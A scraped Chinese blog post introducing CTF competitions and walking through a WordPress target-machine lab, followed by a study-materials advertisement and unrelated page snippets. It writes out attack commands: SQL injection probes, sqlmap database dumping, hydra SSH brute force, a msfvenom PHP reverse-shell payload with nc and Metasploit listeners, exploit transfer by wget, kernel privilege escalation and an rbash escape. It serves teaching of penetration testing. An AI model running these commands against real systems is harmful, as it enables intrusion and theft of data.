.net 网站开发项目结构临沂网站改版

张小明 2026/1/11 11:41:49
.net 网站开发项目结构,临沂网站改版,百度推广关键词和创意,公司网站建立本文是对入门学习的一些概念了解和一些常规场景记录 1.CTF#xff08;capture the flag#xff09;是夺旗赛的意思。 是网络安全技术人员之间进行攻防的比赛。 起源1996年DEFCON全球黑客大会#xff0c;替代之前真实攻击的技术比拼。 (DEFCON极客大会诞生1993#xff0c;…本文是对入门学习的一些概念了解和一些常规场景记录1.CTFcapture the flag是夺旗赛的意思。是网络安全技术人员之间进行攻防的比赛。 起源1996年DEFCON全球黑客大会替代之前真实攻击的技术比拼。 (DEFCON极客大会诞生1993每年7月在拉斯维加斯举行 有黑客比赛的世界杯的说法。 CTF竞赛已成为安全圈最流行竞赛模式。国际知名赛事DEFCON CTFCTF赛事中的“世界杯” UCSB iCTF来自UCSB的面向世界高校的CTF Plaid CTF包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛 Boston Key Party近年来崛起的在线解题赛 Codegate CTF韩国首尔“大奖赛”冠军奖金3000万韩元 Secuinside CTF韩国首尔“大奖赛”冠军奖金3000万韩元 XXC3 CTF欧洲历史最悠久CCC黑客大会举办的CTF国内知名赛事XCTF联赛是国内最权威、最高技术水平与最大影响力的网络安全CTF赛事平台。 (国内亚洲最大竞赛。清华蓝莲花战队发起 强网杯国家级安全比赛网信办网络安全协调局指导。 红帽杯广东公安厅计算机网络安全协会举办 AliCTF:阿里 TCTF:腾讯 BCTF:百度 WCTF:世界大赛邀请制360 HCTF:杭州电子科技大学信息安全协会 ISCC:全国大学生北理工2.竞赛模式1.解题模式jeopardy风险危险)通常是线上参与网络安全技术的题目。 题目包含逆向漏洞挖掘和利用web渗透密码取证隐写安全编程等类型。2.攻防模式attackdefense互相攻击防守挖掘漏洞攻击和修复漏洞防守。3.混杂模式mix)解题和攻防模式结合典型赛事iCTF。3.题目类型3.1.reverse逆向涉及逆向分析能力软件逆向破解技术反汇编和反编译技术。 知识汇编语言加解密反编译工具等。3.2.Pwn破解pwn发音砰破解的意思主要溢出漏洞堆和栈溢出等。 涉及对二进制漏洞挖掘和利用能力。 知识c/c,ODIDA,数据结构操作系统汇编原理。 CE(CheatEngine)用来定位数据ODollydbg)用来动态调试IDA(Interactive Disassembler)用来看代码3.3.webweb安全web站点漏洞挖掘和利用XSS,文件包含代码执行上传漏洞sql注入等。 以及数据包的构造和响应tcp/ip协议。 知识PHPJSP, JAVA, PythonTCP/IPSQLOWASP TOP 103.4.crypto加解密涉及密码学相关技术加解密技术编码解码技术。 知识数论矩阵密码学。3.5.misc(杂项安全相关信息收集隐写流量分析数字取证编码转换。 知识隐写术wireshark流量分析审查等工具使用编码。3.6.mobile移动涉及APP漏洞挖掘和利用iPhone和Android系统以Android的apk破解为主。 知识Android4.学习建议可以刷题或者靶机练习以web安全作为学习入口是不错选择。XCTF攻防世界 Bugku CTF Jarvis OJ ctf.show BUUCTF CTFHub词汇简介POCEXPCVECVSSPOCProof of Concept 漏洞证明漏洞报告中通过一段描述或一个样例来证明漏洞确实存在 EXPExploit 漏洞利用某个漏洞存在EXP意思就是该漏洞存在公开的利用方式比如一个脚本 0DAY 含义是刚刚被发现还没有被公开的漏洞也没有相应的补丁程序威胁极大。 CVECommon Vulnerabilities Exposures 公共漏洞和暴露信息安全漏洞公共的名称。 使用一个共同的名字可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息解决安全问题 。5.靶机实战拿下wordpress提权测试环境kali攻击机和WordPress系统的靶机。 WordPress是一款个人博客框架属于内容管理系统CMS使用PHP语言和mysql数据库架设。攻击过程信息收集漏洞挖掘漏洞利用权限提升。5.1.信息收集包括主机ip端口服务操作系统目录等扫描收集及社工。 1.主机发现工具arp-scan netdiscover fping等。 arp-scan -l //局域网扫描 netdiscover -i eth0 -r 192.168.133.0/24 //网段扫描 通过mac地址得到厂商。 2.端口扫描工具nmap -A:全面探测aggressive进攻性 -sS:SYN扫描半连接 -sV:显示版本 -v:显示vebose详细过程 -p-:全端口1-65535 -T4:延迟级别放弃超时10ms nmap -sS -sV -v -p- -T4 192.168.12.1 nmap -A ip nmap -A -sS -sV -v -p- -T4 192.168.12.1 常见端口和服务 22:ssh 25:smtp 80:http 111:RPCINFO服务 443HTTPS服务 624PRC 3306MYSQL 3.信息收集目标就是威胁建模 (简单来说就是猜测服务可能存在攻击方式和漏洞 对于web服务主要收集服务和系统的名称和版本。 可以利用谷歌浏览器Wappalyzer插件收集系统和服务的版本信息 WordPress版本操作系统数据库类型PHP版本 web地址的参数或者表单验证是否可sql注入 一般首页是没有参数的选择注册页或者可传参数的页面 比如xx?id1 后面加个冒号xxx?id1 后面加 and 11 后者and 12id1 and 11 或者id1 and 12 and sleep(5) 根据响应页面的内容对比判断是否存在注入点。 一般使用工具sqlmap更方便 ssh尝试弱口令爆破 工具九头蛇 美杜莎 4.目录扫描dirbdirbustergobuster御剑等工具。nikto。 对于web目录扫描是关键步骤甚至首步骤。 作用敏感目录和敏感文件可能泄露管理页面遗留文件。发现管理后台数据库管理页面。5.2.漏洞挖掘几种方式 1.对于管理后台尝试 弱口令默认密码常用密码 暴力破解工具burp爆破PHPmyadmin爆破。 比如phpmyadmin(数据库网页管理工具的主页 2.链接的参数注入 工具sqlmap参数-u:url --dbs爆破数据库 -D指定数据库 --tables:爆破数据表 -T:指定表 --columns爆破字段 -C:指定字段可多个 --dump :脱库 sql注入检测sqlmap -u http://xxx?id1 得到数据库web服务器操作系统类型和版本以及具体库 sql注入检测sqlmap -u http://xxx?id1 --dbs 得到哪些库 sqlmap -u xxx?id1 --dbs -D xx --tables 得到爆破xx库的表 sqlmap -u xxx?id1 --dbs -D xx --tables -T xx --columns 得到爆破的字段 sqlmap -u xxx?id1 --dbs -D xx --tables -C xx,xx,xx --dump 得到爆破字段的内容 有时需要cookie登陆后才能sqlmap扫描参数 获取cookie浏览器开发者网络查看或者控制台输入document.cookie获取) sqlmap -u http://xxx?id1 -p id --cookiexxxxxxxxxxx --dbs 通过爆破可能得到账号和密码如果服务支持ssh可以尝试连接 ssh xx用户ipxxxx 密码xxx (制作密码字典工具以及破解crunch hydra 。 比如crunch 8 8 -t admin%% -o dic.txt //8 8最小8位最大八位 -t:占位符 %数字 小写字母 -o:输出文件 暴力破解ssh: hydra -l guest -P dic.txt xx.xx.ip ssh 3.网页前端源码查看 是否只是前端验证。 4.nikto可对web服务器全面漏洞扫描服务器cgi和项目及配置等 cgi通用网关接口:网页原本是静态的通过cgi脚本进行处理生成页面返回给浏览器形成动态交互网页类似servelet。 有时候指服务器有时候 指cgi语言。 nikto -h http://xxx 得到一些敏感目录和文件比如源码b备份sql等 分析源码获得漏洞获取管理员账号等拿到网站管理员权限密码破解获得数据库管理权限以及后台管理员5.3.漏洞利用1.利用MSF生成反弹shell木马 msfvenom -p php/meterpreter/reverse_tcp LHOST自己主机ip LPORT4444 -o Desktop/shell.php 生成php网页木马让目标连接自己主机 kali自带php马:/usr/share/webshells/php/php-reverse-sell.php 2.上传马 将马页面放到php执行目录或者写入可执行某个页面。 3.监听原先木马设置端口以建立链接 几种方式 1)netcat工具类似工具中国菜刀 nc -nlvp 4444 2)msf msfuse exploit/multi/handler set playload php/meterpreter_reverse_tcp set lhost ip exploit 执行后会形成一个会话sessionctrc可退出 输入session 1进入会话: meterpreter linux查看监听netstat -tunlp 4.得到shell 访问马页面监听程序得到反弹shell. 此时这个shell是web服务器的权限也就是Apache服务器权限。 whoami ;查看当前权限 uname -a : 查看linux系统内核版本 如果使用msf监听那么执行exploit连接建立后会得到shell meterpreter 输入sysinfo 查看系统版本信息 输入shell 生成交互shell 还可以切换不同样式的shell:交互更友好 python -c import pty;pty.spawn(/bin/bash) (common shell和 meterpreter shell区分 有些连接得到是common shell 使用ctrz 然后:y 让当前shell隐藏回到msf界面 使用session -l :查看所有会话shell每个会话有个id。 session -u 某id将某会话从common变成meterpreter session -i 某id :进入某id会话 5.权限提升获取root权限 1).漏洞脏牛dirty cowCVE-2016-5195)对Linux内核2.6.22版本2007年发布本地提权直到2016.10才修复。 原理内核的内存子系统在处理写入复制时copy-on-write)产生了竞争条件利用执行顺序异常对只读内存映射进行写入获得root权限。 github官方提供exp 2).漏洞udev(cve2009-1185 linux2.6的一个提权漏洞) searchsploit linux udev (漏洞库搜索udev漏洞的exp) /usr/share/exploitdb/platforms/linux/local/8478.sh exp在靶机执行需要先获取执行文件还的添加执行权限。 提供一个传送地址的几种方式 1).sh放在/tmp下并执行python -m SimpleHTTPServer 80 目标主机获取wget http://xx/xx.sh 查看进程cat /proc/net/netlink 在特定进程执行udev 思路知道漏洞找到漏洞exp。补充低权限rbash提升绕过当用guest用户登陆系统ssh gustxx.xx.xx.ip 得到的shell可能权限非常低很多命令不能使用 当前是rbash解析命令: echo $PATH:查看当前path。 输出/home/guest/prog 输入命令会先到path目录下查找存在才会直接执行否则需要输入全路径才行执行。 echo $PATH/*:查看可以直接执行的命令 输出/home/guest/prog/vi 即表面可以直接执行vi。 进入vi: :!/bin/bash //!在命令前面表示调用外部命令在命令后面wq!)表示强制执行。 执行后命令使用bash来解析。 (sudo以管理员运行su切换用户sudo su 切换到管理员 执行sudo su 显示找不到命令sudo 某目录查找命令 ls -la /bin/sudo ls -la /sbin/sudo ls -la /usr/bin/sudo //确定sudo位置 修改环境变量 export PATH$PATH:/usr/bin/sudo 查看当前path: echo $paht 查找将su命令路径添加到环境 ls -la /bin/su //确认位置 修改path: export PATH$PATH:/bin/su 接下可以执行sudo su需要有密码5.4.如何防御登录后复制1.关闭多余端口最小原则。 2.使用cms等系统修改默认后台路径。 3.数据管理PHPmyadmin修改默认路径和密码。 4.升级操作系统版本及时打补丁修复漏洞。 5.关注最新漏洞情报提升安全运维响应能力。学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

西安有什么网站北京网站建设公司费用浩森宇特

一、护网第 1 天,我没懂任何技术,却被甲方夸 “靠谱” 去年第一次参加护网,我是纯技术小白 —— 不会用 Nmap,看不懂 ELK 日志,本以为只能打酱油,结果领队给我安排了保障组的活。没想到 15 天下来&#xf…

张小明 2026/1/10 21:11:04 网站建设

如何免费建立自己的网站天元建设集团有限公司上班时间

CursorPro免费助手:一键重置额度的完整解决方案 【免费下载链接】cursor-free-everyday 完全免费, 自动获取新账号,一键重置新额度, 解决机器码问题, 自动满额度 项目地址: https://gitcode.com/gh_mirrors/cu/cursor-free-everyday 还在为AI编程助手的免费额…

张小明 2026/1/1 23:04:22 网站建设

网站建设合同 英文挖掘关键词的工具

Excalidraw 与 Schema.org:让手绘图谱被搜索引擎“看懂” 在技术文档、系统设计和团队协作日益依赖可视化表达的今天,一张清晰的手绘风格架构图往往比千言万语更有效。Excalidraw 正是这样一款迅速走红的开源工具——它用极简界面和“手绘感”线条&…

张小明 2026/1/9 22:39:25 网站建设

北京网站制作业务如何开展客户端网站建设文档

信捷XDPLC与3台台达DT330温控器通讯程序输出启停控制(XJXD-2) 功能:通过信捷XD5,实现对3台台达DT330温控器设定温度,读取温度,控制温控器输出启停,反应灵敏,通讯稳定可靠。 程序采用轮询方式 器件&#xff…

张小明 2026/1/2 3:21:54 网站建设

网站公司利润申请企业邮箱步骤是什么?

Git 下载最新版 Qwen3-VL-8B 模型权重的操作步骤 在多模态 AI 技术迅速落地的今天,越来越多的应用开始要求模型不仅能“看懂”图像,还能用自然语言描述它。从智能客服自动解析用户上传的商品截图,到医疗辅助系统解读医学影像并生成报告摘要&a…

张小明 2026/1/3 0:35:55 网站建设

山东省工程建设信息官方网站如何在网站中做公示信息

EmotiVoice能否替代真人配音?成本与质量对比分析 在短视频日更、播客爆发、虚拟偶像崛起的今天,内容创作者们正面临一个共同难题:如何以合理成本,持续产出富有情感温度的声音内容?传统真人配音虽然真实动人&#xff0…

张小明 2026/1/2 21:02:15 网站建设